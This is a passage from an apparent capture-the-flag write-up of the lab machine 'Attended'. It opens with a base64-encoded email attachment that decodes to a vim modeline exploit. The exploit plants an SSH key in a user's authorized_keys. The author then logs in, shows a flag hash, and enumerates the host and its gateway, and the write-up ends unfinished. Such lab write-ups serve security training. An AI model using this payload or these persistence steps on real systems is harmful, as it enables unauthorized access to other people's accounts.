 -> YTNqdXo0TVo4VkMyWnlSVUgxNEVWM25lYWluMmZSOXllUE4wRzV2OHZibmd4OU96WGpQK3NuVG9j
 -> eVlXRlhVcytGOWxWRT0gPj4gL2hvbWUvZnJlc2huZXNzLy5zc2gvYXV0aG9yaXplZF9rZXlzXG4n
 -> ID4+IC9ob21lL3NoYXJlZC8uY29uZmlnIHx8IiB2aTpmZW46ZmRtPWV4cHI6ZmRlPWFzc2VydF9m
 -> YWlscygic291cmNlXCFcIFwlIik6ZmRsPTA6ZmR0PSIK
 -> 
 -> ------=_MIME_BOUNDARY_000_1584577--
 -> 
 -> 
 -> .
<-  250 2.0.0: 89efa82a Message accepted for delivery
 -> QUIT
<-  221 2.0.0: Bye
=== Connection closed with remote host.

My final email

User.txt

attended$ ls -la
total 56
drwxr-x---  4 freshness  freshness  512 May  7 05:00 .
drwxr-xr-x  5 root       wheel      512 Jun 26  2019 ..
-rw-r--r--  1 freshness  freshness   87 Jun 26  2019 .Xdefaults
-rw-r--r--  1 freshness  freshness  771 Jun 26  2019 .cshrc
-rw-r--r--  1 freshness  freshness  101 Jun 26  2019 .cvsrc
-rw-r--r--  1 freshness  freshness  359 Jun 26  2019 .login
-rw-r--r--  1 freshness  freshness  175 Jun 26  2019 .mailrc
-rw-r--r--  1 freshness  freshness  215 Jun 26  2019 .profile
drwx------  2 freshness  freshness  512 Aug  6  2019 .ssh
-rw-------  1 freshness  freshness  754 May  7 04:59 .viminfo
drwxr-x---  2 freshness  freshness  512 Nov 16 13:57 authkeys
-rw-r--r--  1 freshness  freshness  436 May  7 04:46 dead.letter
-rwxr-x---  1 root       freshness  422 Jun 28  2019 fchecker.py
-r--r-----  1 root       freshness   33 Jun 26  2019 user.txt
attended$ cat user.txt
b0390ad535424c0981699b93041a3ff1

After inserting my public key to /home/freshness/.ssh/authorized_keys I was able to log in using SSH. Waiting in freshness’s home folder was my user proof!

Path to Power (Gaining Administrator Access)

Enumeration as user `freshness`

attended$ id
uid=1001(freshness) gid=1001(freshness) groups=1001(freshness)

There were no interesting groups for freshness.

attended$ doas su
doas: doas is not enabled, /etc/doas.conf: No such file or directory

The command doas (the BSD equivilent of sudo) was not enabled on this machine.

attended$ cat /etc/passwd
root:*:0:0:Charlie &:/root:/bin/ksh
daemon:*:1:1:The devil himself:/root:/sbin/nologin
operator:*:2:5:System &:/operator:/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin
build:*:21:21:base and xenocara build:/var/empty:/bin/ksh
sshd:*:27:27:sshd privsep:/var/empty:/sbin/nologin
_portmap:*:28:28:portmap:/var/empty:/sbin/nologin
_identd:*:29:29:identd:/var/empty:/sbin/nologin
_rstatd:*:30:30:rpc.rstatd:/var/empty:/sbin/nologin
_rusersd:*:32:32:rpc.rusersd:/var/empty:/sbin/nologin
_fingerd:*:33:33:fingerd:/var/empty:/sbin/nologin
_x11:*:35:35:X Server:/var/empty:/sbin/nologin
_unwind:*:48:48:Unwind Daemon:/var/empty:/sbin/nologin
_switchd:*:49:49:Switch Daemon:/var/empty:/sbin/nologin
_traceroute:*:50:50:traceroute privdrop user:/var/empty:/sbin/nologin
_ping:*:51:51:ping privdrop user:/var/empty:/sbin/nologin
_rebound:*:52:52:Rebound DNS Daemon:/var/empty:/sbin/nologin
_unbound:*:53:53:Unbound Daemon:/var/unbound:/sbin/nologin
_dpb:*:54:54:dpb privsep:/var/empty:/sbin/nologin
_pbuild:*:55:55:dpb build user:/nonexistent:/sbin/nologin
_pfetch:*:56:56:dpb fetch user:/nonexistent:/sbin/nologin
_pkgfetch:*:57:57:pkg fetch user:/nonexistent:/sbin/nologin
_pkguntar:*:58:58:pkg untar user:/nonexistent:/sbin/nologin
_spamd:*:62:62:Spam Daemon:/var/empty:/sbin/nologin
www:*:67:67:HTTP Server:/var/www:/sbin/nologin
_isakmpd:*:68:68:isakmpd privsep:/var/empty:/sbin/nologin
_syslogd:*:73:73:Syslog Daemon:/var/empty:/sbin/nologin
_pflogd:*:74:74:pflogd privsep:/var/empty:/sbin/nologin
_bgpd:*:75:75:BGP Daemon:/var/empty:/sbin/nologin
_tcpdump:*:76:76:tcpdump privsep:/var/empty:/sbin/nologin
_dhcp:*:77:77:DHCP programs:/var/empty:/sbin/nologin
_mopd:*:78:78:MOP Daemon:/var/empty:/sbin/nologin
_tftpd:*:79:79:TFTP Daemon:/var/empty:/sbin/nologin
_rbootd:*:80:80:rbootd Daemon:/var/empty:/sbin/nologin
_ppp:*:82:82:PPP utilities:/var/empty:/sbin/nologin
_ntp:*:83:83:NTP Daemon:/var/empty:/sbin/nologin
_ftp:*:84:84:FTP Daemon:/var/empty:/sbin/nologin
_ospfd:*:85:85:OSPF Daemon:/var/empty:/sbin/nologin
_hostapd:*:86:86:HostAP Daemon:/var/empty:/sbin/nologin
_dvmrpd:*:87:87:DVMRP Daemon:/var/empty:/sbin/nologin
_ripd:*:88:88:RIP Daemon:/var/empty:/sbin/nologin
_relayd:*:89:89:Relay Daemon:/var/empty:/sbin/nologin
_ospf6d:*:90:90:OSPF6 Daemon:/var/empty:/sbin/nologin
_snmpd:*:91:91:SNMP Daemon:/var/empty:/sbin/nologin
_ypldap:*:93:93:YP to LDAP Daemon:/var/empty:/sbin/nologin
_rad:*:94:94:IPv6 Router Advertisement Daemon:/var/empty:/sbin/nologin
_smtpd:*:95:95:SMTP Daemon:/var/empty:/sbin/nologin
_rwalld:*:96:96:rpc.rwalld:/var/empty:/sbin/nologin
_nsd:*:97:97:NSD Daemon:/var/empty:/sbin/nologin
_ldpd:*:98:98:LDP Daemon:/var/empty:/sbin/nologin
_sndio:*:99:99:sndio privsep:/var/empty:/sbin/nologin
_ldapd:*:100:100:LDAP Daemon:/var/empty:/sbin/nologin
_iked:*:101:101:IKEv2 Daemon:/var/empty:/sbin/nologin
_iscsid:*:102:102:iSCSI Daemon:/var/empty:/sbin/nologin
_smtpq:*:103:103:SMTP Daemon:/var/empty:/sbin/nologin
_file:*:104:104:file privsep:/var/empty:/sbin/nologin
_radiusd:*:105:105:RADIUS Daemon:/var/empty:/sbin/nologin
_eigrpd:*:106:106:EIGRP Daemon:/var/empty:/sbin/nologin
_vmd:*:107:107:VM Daemon:/var/empty:/sbin/nologin
_tftp_proxy:*:108:108:tftp proxy daemon:/nonexistent:/sbin/nologin
_ftp_proxy:*:109:109:ftp proxy daemon:/nonexistent:/sbin/nologin
_sndiop:*:110:110:sndio privileged user:/var/empty:/sbin/nologin
_syspatch:*:112:112:syspatch unprivileged user:/var/empty:/sbin/nologin
_slaacd:*:115:115:SLAAC Daemon:/var/empty:/sbin/nologin
nobody:*:32767:32767:Unprivileged user:/nonexistent:/sbin/nologin
guly:*:1000:1000:guly:/home/guly:/bin/ksh
freshness:*:1001:1001:freshness:/home/freshness:/bin/ksh

guly, freshness, and root were the only users that could log into this machine. Their shell was ksh which might have explained why my complicated python requests/piping shell script into sh didnt work…

attended$ which sh
/bin/sh

Though, then again sh was installed…not sure. It worked on my local machine…

attended$ cat dead.letter                                                                             
Date: Fri, 7 May 2021 04:46:30 +0200 (CEST)
From: root (Cron Daemon)
To: freshness
Subject: Cron <freshness@attended> /home/freshness/fchecker.py
Auto-Submitted: auto-generated
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/home/freshness>
X-Cron-Env: <LOGNAME=freshness>
X-Cron-Env: <USER=freshness>

Pseudo-terminal will not be allocated because stdin is not a terminal.
kex_exchange_identification: Connection closed by remote host

The file dead.letter had what looked to be error information from freshness regarding his config.

attended$ cat fchecker.py                                                                             
#!/usr/local/bin/python2.7
import os,sys
import subprocess
import time

path = '/home/shared/'
command = '/usr/bin/ssh -l freshness -F %s 127.0.0.1'
for r, d, fs in os.walk(path):
        for f in fs:
                cfile = os.path.join(r, f)
                c = command % cfile
                #print "running %s" % c
                p = subprocess.Popen(c,shell=True)
                time.sleep(0.2)
                os.unlink(cfile)

There was also a python2.7 script fchecker.py which looked like it was automating the user freshness’s login attempts, and would use the config file specified in /home/shared using the -F parameter.

attended$ cat .viminfo 
# This viminfo file was generated by Vim 8.1.
# You may edit it if you're careful!

# Viminfo version
|1,4

# Value of 'encoding' when this file was written
*encoding=latin1


# hlsearch on (H) or off (h):
~h
# Command Line History (newest to oldest):
:q
|2,0,1620356392,,"q"

# Search String History (newest to oldest):

# Expression History (newest to oldest):

# Input Line History (newest to oldest):

# Debug Line History (newest to oldest):

# Registers:

# File marks:
'0  1  0  /home/shared/.config
|4,48,1,0,1620356392,"/home/shared/.config"

# Jumplist (newest first):
-'  1  0  /home/shared/.config
|4,39,1,0,1620356392,"/home/shared/.config"

# History of marks within files (newest to oldest):

> /home/shared/.config
        *       1620356390      0
        "       1       0

The .viminfo file only contained history information for the config file I had used to gain access.

attendedgw

attended$ ls -la .ssh
total 16
drwx------  2 freshness  freshness   512 Aug  6  2019 .
drwxr-x---  4 freshness  freshness   512 May  7 05:00 ..
-rw-------  1 freshness  freshness  1760 May  7 04:46 authorized_keys
-rw-r--r--  1 freshness  freshness   360 Nov 16 13:50 known_hosts
attended$ cat .ssh/known_hosts                                                                        
[192.168.23.1]:2222 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHf+XKQUspSh+OB5tQGfllnRm6GbrItHiYWixZj4vCVxxt8DsjRsH8LPbcdxomwm/FpH9HekC+QAO+7FZAj+DsQ=
[attendedgw]:2222 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHf+XKQUspSh+OB5tQGfllnRm6GbrItHiYWixZj4vCVxxt8DsjRsH8LPbcdxomwm/FpH9HekC+QAO+7FZAj+DsQ=
attended$ hostname
attended.htb

I found evidence of another machine 192.168.23.1 and the hostname attendedgw that I had seen guly mailing me from as well in the known_hosts file.

attended$ ifconfig
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 32768
        index 3 priority 0 llprio 3
        groups: lo
        inet6 ::1 prefixlen 128
        inet6 fe80::1%lo0 prefixlen 64 scopeid 0x3
        inet 127.0.0.1 netmask 0xff000000
vio0: flags=8b43<UP,BROADCAST,RUNNING,PROMISC,ALLMULTI,SIMPLEX,MULTICAST> mtu 1500
        lladdr 00:10:20:30:40:50
        index 1 priority 0 llprio 3
        groups: egress
        media: Ethernet autoselect
        status: active
        inet 192.168.23.2 netmask 0xffffff00 broadcast 192.168.23.255
enc0: flags=0<>
        index 2 priority 0 llprio 3
        groups: enc
        status: active
pflog0: flags=141<UP,RUNNING,PROMISC> mtu 33136
        index 4 priority 0 llprio 3
        groups: pflog

interface vio0 was in PROMISC mode which was interesting

attended$ which tcpdump
/usr/sbin/tcpdump
attended$ tcpdump -i vio0
tcpdump: Failed to open bpf device for vio0: Permission denied

unfortunately I was not allowed to run tcpdump

attended$ route -n
usage: route [-dnqtv] [-T rtable] command [[modifiers] args]
commands: add, change, delete, exec, flush, get, monitor, show
attended$ route show
Routing tables

Internet:
Destination        Gateway            Flags   Refs      Use   Mtu  Prio Iface
default            attendedgw.attende UGS        1     2183     -     8 vio0 
224/4              localhost          URS        0        0 32768     8 lo0  
127/8              localhost          UGRS       0        0 32768     8 lo0  
localhost          localhost          UHhl       1      522 32768     1 lo0  
192.168.23/24      attended.attended. UCn        1        0     -     4 vio0 
attendedgw.attende fe:e1:ba:d0:8d:9f  UHLch      2      220     -     3 vio0 
attended.attended. 00:10:20:30:40:50  UHLl       0     2352     -     1 vio0 
192.168.23.255     attended.attended. UHb        0        0     -     1 vio0 

Internet6:
Destination        Gateway            Flags   Refs      Use   Mtu  Prio Iface
::/96              localhost          UGRS       0        0 32768     8 lo0  
localhost          localhost          UHhl      10       20 32768     1 lo0  

::ffff:0.0.0.0/96  localhost          UGRS       0        0 32768     8 lo0  
2002::/24          localhost          UGRS       0        0 32768     8 lo0  
2002:7f00::/24     localhost          UGRS       0        0 32768     8 lo0  
2002:e000::/20     localhost          UGRS       0        0 32768     8 lo0  
2002:ff00::/24     localhost          UGRS       0        0 32768     8 lo0  
fe80::/10          localhost          UGRS       0        0 32768     8 lo0  
fec0::/10          localhost          UGRS       0        0 32768     8 lo0  
fe80::1%lo0        fe80::1%lo0        UHl        0        0 32768     1 lo0  
ff01::/16          localhost          UGRS       0        0 32768     8 lo0  
ff01::%lo0/32      fe80::1%lo0        Um         0        1 32768     4 lo0  
ff02::/16          localhost          UGRS       0        0 32768     8 lo0  
ff02::%lo0/32      fe80::1%lo0        Um         0        1 32768     4 lo0

I checked the routing tables and saw that there were a few other hosts

attended$ ping attendedgw
PING attendedgw.attended.htb (192.168.23.1): 56 data bytes
64 bytes from 192.168.23.1: icmp_seq=0 ttl=255 time=0.618 ms
64 bytes from 192.168.23.1: icmp_seq=1 ttl=255 time=0.346 ms
64 bytes from 192.168.23.1: icmp_seq=2 ttl=255 time=0.290 ms
64 bytes from 192.168.23.1: icmp_seq=3 ttl=255 time=0.377 ms
^C
--- attendedgw.attended.htb ping statistics ---
4 packets transmitted, 4 packets received, 0.0% packet loss
round-trip min/avg/max/std-dev = 0.290/0.408/0.618/0.125 ms

I could ping attendedgw which had the ip 192.168.23.1

attended$ ssh freshness@attendedgw
ssh: connect to host attendedgw port 22: Connection refused
attended$ ssh freshness@attendedgw -p 2222
freshness@attendedgw's password: 
Permission denied, please try again.
freshness@attendedgw's password: 
Permission denied, please try again.
freshness@attendedgw's password: 
freshness@attendedgw: Permission denied (publickey,password,keyboard-interactive).

I tried to SSH into attendedgw but I needed a password for freshness. SSH for the other machine was also on port 2222

authkeys

attended$ cd authkeys/                                                                                
attended$ ls -la
total 24
drwxr-x---  2 freshness  freshness   512 Nov 16 13:57 .
drwxr-x---  4 freshness  freshness   512 May  7 05:00 ..
-rw-r--r--  1 root       wheel      5424 Nov 16 13:35 authkeys
-rw-r-----  1 root       freshness   178 Nov  6  2019 note.txt
attended$ cat note.txt                                                                                
on attended:
[ ] enable authkeys command for sshd
[x] remove source code
[ ] use nobody
on attendedgw:
[x] enable authkeys command for sshd
[x] remove source code
[ ] use nobody

So the source code of this authkeys file had been removed, but not implemented on this machine. On the machine attendedgw however, it had been implemented for sshd. I was curious as to what this file was or did

attended$ file authkeys           
authkeys: ELF 64-bit LSB executable, x86-64, version 1

It was a 64-bit ELF executable file.

attended$ ./authkeys                                                                                  
ksh: ./authkeys: cannot execute - Permission denied

I was not allowed to run the file

Getting a shell

Under Construction! This machine took so long that I didn’t finish before the deadline. Sorry! I will have to finish this one at a later time.

Root.txt

Thanks to <box_creator> for something interesting or useful about this machine.

If you have comments, issues, or other feedback, or have any other fun or useful tips or tricks to share, feel free to contact me on Github at https://github.com/zweilosec or in the comments below!

If you like this content and would like to see more, please consider buying me a coffee!